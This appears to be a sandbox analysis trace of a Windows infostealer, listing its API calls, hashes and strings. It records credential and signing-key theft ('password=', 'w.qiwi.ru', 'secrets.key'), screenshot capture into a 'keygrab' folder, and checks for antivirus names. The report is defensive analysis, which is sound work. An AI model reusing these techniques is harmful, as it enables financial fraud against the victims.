                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,antivir,?,?,012E62EC), ref: 012E61FF
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,avira,?,?,012E62EC), ref: 012E620B
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,virustotal,?,?,012E62EC), ref: 012E6217
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,virusinfo,?,?,012E62EC), ref: 012E6223
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,z-oleg.com,?,?,012E62EC), ref: 012E622F
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,trendsecure,?,?,012E62EC), ref: 012E623B
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,anti-malware,?,?,012E62EC), ref: 012E6247
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,.comodo.com,?,?,012E62EC), ref: 012E6253
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                              • API String ID: 0-375433535
                                                                                                                                                                                                              • Opcode ID: 73cfd2d1e245ec1e0118e847b5417ca1443a1924c68cef5edd3e677b09f536dd
                                                                                                                                                                                                              • Instruction ID: faf53769a90b8c124fbe9759853a274966d3ab29f6e3e5ee57952fcccc169f89
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73cfd2d1e245ec1e0118e847b5417ca1443a1924c68cef5edd3e677b09f536dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D012E7235672775A632316E0C75EDF42CC1EE199EB850528F704E150AE7869307046A
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 012FCC41
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 012FCC52
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 012FCC60
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FCC69
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012FCC81
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FCC93
                                                                                                                                                                                                              • TerminateThread.KERNEL32(00000000,00000000), ref: 012FCCA5
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0001C6F0,00000000,00000000,00000000), ref: 012FCCBA
                                                                                                                                                                                                              • Sleep.KERNEL32(0000EA60), ref: 012FCCCA
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FCCE4
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 012FCD4D
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FCD74
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 012FCDD7
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FCDE2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashMutex$ExistsFileHandleOpenSleepThread$CloseCreateInformationReleaseTerminate
                                                                                                                                                                                                              • String ID: 61C5C0CB$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}$P0Mw$pass.log$path.txt
                                                                                                                                                                                                              • API String ID: 2618501214-3699612867
                                                                                                                                                                                                              • Opcode ID: 3f04d46fbc1fcdc6ae1b30713182ccf5663928be9b56a132123ec559eb09846f
                                                                                                                                                                                                              • Instruction ID: 843544044d847b700945d5b4ed5a016125c2b4b81f91e2b857a85a5665605423
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f04d46fbc1fcdc6ae1b30713182ccf5663928be9b56a132123ec559eb09846f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C451053160835A5BCB32AF289825FABFFD8AB85B04F14442DFB85D7381DBA0D418C795
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,w.qiwi.ru,?,00000000,?), ref: 01301D79
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,phone=), ref: 01301D8C
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,password=), ref: 01301D9F
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C391), ref: 01301DCD
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C391), ref: 01301E03
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?), ref: 01301E6D
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01301E77
                                                                                                                                                                                                              • #680.SHELL32 ref: 01301E7F
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01301E90
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01301E97
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 01301EA4
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01301F30,00000000,00000000,00000000,?,00000000,?), ref: 01301EEA
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 01301F02
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301F13
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Pathstrstr$BackslashCreateDirectoryErrorHandleLast$#680CloseCurrentFolderInformationMakeSystemThread
                                                                                                                                                                                                              • String ID: 61C5C391$GET $pass.txt$password=$phone=$w.qiwi.ru
                                                                                                                                                                                                              • API String ID: 2193638823-1298422488
                                                                                                                                                                                                              • Opcode ID: ca1cd8186e186baf984b861ae9c0b7f426d93d041ae8894d3ed35c92b66052cd
                                                                                                                                                                                                              • Instruction ID: 7cb5d58f3afa3b2a128414c53e64a81ebe05bae6888534e1b36b992c0a498246
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca1cd8186e186baf984b861ae9c0b7f426d93d041ae8894d3ed35c92b66052cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F551E1316002155BDB326A2C9C787FB7BE8BF51709F14425CE985D7281DBB0D948CBD4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 012E101B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 012E103E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012E1045
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000013), ref: 012E1055
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 012E1073
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,name.key,00000000), ref: 012E1093
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01300810,00000000,00000000,00000000), ref: 012E10B9
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,\secrets.key), ref: 012E10D5
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,013020D0,00000000,00000000,00000000), ref: 012E10E5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,sign.key), ref: 012E10FD
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01302BB0,00000000,00000000,00000000), ref: 012E1116
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012E112A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012E113B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E1150
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012E1153
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012E115F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012E1162
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                              • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                              • API String ID: 3254303593-2345338882
                                                                                                                                                                                                              • Opcode ID: cd4cdf848b43ba525dd1558ded17f607c90ce8b9be27a018723bcd2d70bc0cd1
                                                                                                                                                                                                              • Instruction ID: 5dd07426ce895ba72661e2ac124bbb82874e1389a44d886f66beb5e5b93eb56c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd4cdf848b43ba525dd1558ded17f607c90ce8b9be27a018723bcd2d70bc0cd1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D4191312113627AE7326A6A9C8CDBF7EACEBC7F60B94422CFA1596184D735C511C7B0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c09f,00000000,00000001), ref: 012FB5E6
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133D788,00000000), ref: 012FB621
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FB627
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FB62F
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133D788), ref: 012FB63E
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FB645
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 012FB67B
                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,0133D788,00000000), ref: 012FB6B3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 012FB6C6
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732},00000006), ref: 012FB6E3
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FB6E6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastMutexPathSleep$#680BackslashCopyDirectoryFileFolderMakeReleaseSystem
                                                                                                                                                                                                              • String ID: 61c5c09f$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Mw
                                                                                                                                                                                                              • API String ID: 495793069-57594846
                                                                                                                                                                                                              • Opcode ID: f36d721f7ba32be07aee1c8edaa4d12e3e7393fc534cbae632aa3c3b39d008a1
                                                                                                                                                                                                              • Instruction ID: cbb92c15996dfc886af38c779a660d5dccccd13cf7625aa7f53ec44417654e42
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f36d721f7ba32be07aee1c8edaa4d12e3e7393fc534cbae632aa3c3b39d008a1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D04139316047425BEB322F78DC5DBAA7ED9AF8AB45F08401DFB46DB281CA608904C790
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012EDF80: GetDesktopWindow.USER32(774D30D0,?,?,774D30D0,?,?,012EE016,?,012EA857,?,774D30D0,?), ref: 012EDF8E
                                                                                                                                                                                                                • Part of subcall function 012EDF80: RealChildWindowFromPoint.USER32(00000000,?,012EE016,?,012EA857,?,774D30D0,?), ref: 012EDF95
                                                                                                                                                                                                                • Part of subcall function 012EDF80: IsWindowVisible.USER32(00000000,774D30D0,?,?,012EE016,?,012EA857,?,774D30D0,?), ref: 012EDFC1
                                                                                                                                                                                                                • Part of subcall function 012EDF80: GetParent.USER32(00000000,?,012EE016,?,012EA857,?,774D30D0,?), ref: 012EDFC8
                                                                                                                                                                                                                • Part of subcall function 012EDF80: GetWindowLongA.USER32(00000000,000000EC,774D30D0,?,?,012EE016,?,012EA857,?,774D30D0,?), ref: 012EDFD3
                                                                                                                                                                                                                • Part of subcall function 012EDF80: WindowFromPoint.USER32(774D30D0,?,?,012EE016,?,012EA857,?,774D30D0,?), ref: 012EDFE8
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(?,?,012EA857,?,012EA857,?,774D30D0,?), ref: 012EE037
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000084,00000000,012EA857,00000002,00000064,?,?,012EA857,?,774D30D0,?), ref: 012EE05D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 012EE081
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 012EE092
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 012EE09D
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 012EE0BB
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 012EE0C6
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,012EA857), ref: 012EE0D2
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002), ref: 012EE0E6
                                                                                                                                                                                                              • GetWindowInfo.USER32(?,?), ref: 012EE129
                                                                                                                                                                                                              • PtInRect.USER32(?,?,012EA857), ref: 012EE154
                                                                                                                                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 012EE174
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000084,00000000,012EA857,00000002,00000064,000000FF), ref: 012EE1A3
                                                                                                                                                                                                              • MapWindowPoints.USER32(?,?,00000000,00000001), ref: 012EE1D0
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(?,00000000,?), ref: 012EE1DB
                                                                                                                                                                                                              • MapWindowPoints.USER32(?,00000000,00000000,00000001), ref: 012EE1F7
                                                                                                                                                                                                              • RealChildWindowFromPoint.USER32(00000000,00000000,?), ref: 012EE202
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Long$FromPoint$ChildReal$MessagePointsSendTimeout$AncestorDesktopInfoMutexObjectParentRectReleaseSingleVisibleWait
                                                                                                                                                                                                              • String ID: <$P0Mw
                                                                                                                                                                                                              • API String ID: 1846550538-2464927828
                                                                                                                                                                                                              • Opcode ID: b36239421891687f0cbaa81913a48678a45938ddf79b40cd2b95cf510fa3f8ed
                                                                                                                                                                                                              • Instruction ID: 4ec51f0bd950b8ae6dea421b039f13caa9b158c0fb9de8c0a9143c6f510bef80
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b36239421891687f0cbaa81913a48678a45938ddf79b40cd2b95cf510fa3f8ed
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F561847561021AAFDB30DE58DC88EBE77ADEB84721F504219FE11E7284DA71DD41C760
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C387), ref: 013010F0
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01301131
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0130113B
                                                                                                                                                                                                              • #680.SHELL32 ref: 01301143
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01301154
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0130115B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0130119A
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 013011A7
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 013011F0
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 0130120C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 01301229
                                                                                                                                                                                                                • Part of subcall function 01309780: GetProcessHeap.KERNEL32(00000008,00004070,00000001,00000000,775B5CE0,?,012F3CE8,?), ref: 01309793
                                                                                                                                                                                                                • Part of subcall function 01309780: HeapAlloc.KERNEL32(00000000,?,012F3CE8,?), ref: 01309796
                                                                                                                                                                                                                • Part of subcall function 01309780: memset.MSVCRT(00000000,00000000,00004070,?,012F3CE8,?), ref: 013097AB
                                                                                                                                                                                                                • Part of subcall function 01309780: CreateFileA.KERNEL32(012F3CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,012F3CE8,?), ref: 01309802
                                                                                                                                                                                                                • Part of subcall function 01309780: GetProcessHeap.KERNEL32(00000000,00000000,?,012F3CE8,?), ref: 01309825
                                                                                                                                                                                                                • Part of subcall function 01309780: HeapValidate.KERNEL32(00000000,?,012F3CE8,?), ref: 01309828
                                                                                                                                                                                                                • Part of subcall function 01309780: GetProcessHeap.KERNEL32(00000000,00000000,?,012F3CE8,?), ref: 01309834
                                                                                                                                                                                                                • Part of subcall function 01309780: HeapFree.KERNEL32(00000000,?,012F3CE8,?), ref: 01309837
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?), ref: 01301258
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C387), ref: 01301277
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 013012DB
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 013012E8
                                                                                                                                                                                                                • Part of subcall function 01309910: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,775B5CE0), ref: 01309991
                                                                                                                                                                                                                • Part of subcall function 01309910: _snprintf.MSVCRT(00000000,00000104,%s\*,00000000), ref: 013099AD
                                                                                                                                                                                                                • Part of subcall function 01309910: FindFirstFileA.KERNEL32(00000000,?), ref: 013099BC
                                                                                                                                                                                                                • Part of subcall function 01309910: LocalFree.KERNEL32(00000000), ref: 013099C9
                                                                                                                                                                                                                • Part of subcall function 01309910: wsprintfA.USER32(?,%s\%s,00000000,0000002E), ref: 01309A08
                                                                                                                                                                                                                • Part of subcall function 01309910: wsprintfA.USER32(00000000,%s\%s,00000000,?), ref: 01309A16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$AllocFreePathProcess$AttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$#680CurrentDeleteFindFirstFolderMakeModuleNameSystemValidate_snprintflstrcpynmemset
                                                                                                                                                                                                              • String ID: 61C5C387$\$inter.zip$path.txt
                                                                                                                                                                                                              • API String ID: 2230608801-2171418579
                                                                                                                                                                                                              • Opcode ID: c212ef6807419b16e255636122cf9b2144de9bdb34885863537effe46623c7ec
                                                                                                                                                                                                              • Instruction ID: d34589cf1bbe101d1df6a6acd91d088aca1c0416b12c4f5beec901a6f37592a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c212ef6807419b16e255636122cf9b2144de9bdb34885863537effe46623c7ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A61067050030A9FDB36DF2898A8BEB7BE8BF45309F144198E989D7285DB70D648CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435,?,?,00000000), ref: 01302920
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000), ref: 01302961
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 0130296B
                                                                                                                                                                                                              • #680.SHELL32(?,?,00000000), ref: 01302973
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01302984
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0130298B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 013029BF
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,00000000), ref: 013029CC
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000000), ref: 01302A10
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,?,00000000), ref: 01302A2C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 01302A49
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorFileLastPath$#680AllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemVirtuallstrcpyn
                                                                                                                                                                                                              • String ID: 61C5C435$\$path.txt$rfk.zip
                                                                                                                                                                                                              • API String ID: 1623271082-3154236201
                                                                                                                                                                                                              • Opcode ID: 693707f71144a34108511ba96f566d2d9d6cd9b139d6c41467cfeaa326638f04
                                                                                                                                                                                                              • Instruction ID: 43907c77e02a86abb859fd7c26833bf962ed198776fa13a6fdba6633d1382a5f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 693707f71144a34108511ba96f566d2d9d6cd9b139d6c41467cfeaa326638f04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F861D63050065A5FEB339F2898ACBFB7BE8AF45305F144198E5C9D7281DF709A88CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012F2370: memset.MSVCRT(?,00000000,00000206), ref: 012F2392
                                                                                                                                                                                                                • Part of subcall function 012F2370: GetParent.USER32(?), ref: 012F239E
                                                                                                                                                                                                                • Part of subcall function 012F2370: GetWindowTextW.USER32(00000000,?,00000104), ref: 012F23B5
                                                                                                                                                                                                                • Part of subcall function 012F2370: StrStrIW.SHLWAPI(?,00000000), ref: 012F23D6
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0132FB38), ref: 012F2446
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012F2474
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,?), ref: 012F2488
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012F2499
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012F249F
                                                                                                                                                                                                              • #680.SHELL32 ref: 012F24A8
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012F24B9
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000201), ref: 012F24C3
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,keygrab), ref: 012F24D5
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012F24E0
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012F24E6
                                                                                                                                                                                                              • #680.SHELL32 ref: 012F24EE
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012F24FF
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012F2506
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012F2513
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%02u.bmp,?), ref: 012F2543
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB38), ref: 012F2563
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$ErrorLast$#680AppendBackslashCreateCriticalDirectoryFolderMakeSectionSystem$EnterLeaveParentTextWindow_snprintfmemset
                                                                                                                                                                                                              • String ID: %02u.bmp$keygrab
                                                                                                                                                                                                              • API String ID: 3034168964-4222822809
                                                                                                                                                                                                              • Opcode ID: baf8bf34766166f2b50887f0cfb8a39038788c9fab12dc60167940ab21692fff
                                                                                                                                                                                                              • Instruction ID: 7b3ce1207cee060134097d9e8a9657f05a817ac9a7d3489ee07b41effba2a918
                                                                                                                                                                                                              • Opcode Fuzzy Hash: baf8bf34766166f2b50887f0cfb8a39038788c9fab12dc60167940ab21692fff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26316D7550021ADBDB30EFA89C58AE9BBBCEF59311F0444ACE685D7144DBB4DA84CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0132FB20,00000000,00000000,00000000,?,012F1A39), ref: 012F1330
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020,?,012F1A39), ref: 012F1398
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,012F1A39), ref: 012F139F
